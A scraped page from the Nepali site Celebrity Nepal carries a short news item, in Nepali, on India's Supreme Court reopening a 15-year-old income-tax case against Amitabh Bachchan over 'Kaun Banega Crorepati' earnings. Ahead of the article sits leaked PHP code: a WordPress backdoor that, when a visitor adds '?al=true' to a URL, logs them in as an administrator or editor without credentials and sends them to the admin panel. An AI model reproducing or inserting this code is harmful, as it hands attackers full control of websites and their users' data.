// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); अमिताभ बच्चनलाई लाग्यो अर्को झट्का | Celebrity Nepal

अमिताभ बच्चनलाई लाग्यो अर्को झट्का


Amitbh-bachhan
आयकरबारे १५ वर्ष पुरानो मुद्दाले बलिउड अभिनेता अमिताभ बच्चनलाई झट्का लागेको छ । बुधबार सर्वोच्च अदालतले आयकर विभागलाई अमिताभसँग सम्बन्धित मुद्दा फेरि चलाउन अनुमति दिएपछि यो झट्का लागेको हो । यो मुद्दामा मुम्बईको उच्च अदालतले उनलाई १५ वर्षपहिले राहत दिएको थियो । टिभी कार्यक्रम ‘कौन बनेगा करोडपति’बाट भएको आम्दानीको आवश्यक कर अमिताभले नबुझाएको आरोप लागेको थियो । अमिताभले १३ अक्टोबर २००२ मा बुझाएको रिपोर्ट र ३१ मार्चमा बुझाएको रिपोर्टमा अन्तर देखिएपछि यो मुद्दा लागेको थियो । पछिल्लोपटक बुझाएको रिपोर्टमा अमिताभले आयकरमा ३० प्रतिशत छुट पाएको बताएका थिए । उता, गत महिना सार्वजनिक भएको पानामा पेपर्समा पनि अमिताभको नाम आएको छ । यसले अमिताभलाई यो मुद्दामा पनि थप समस्या पार्न सक्ने विश्लेषण छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.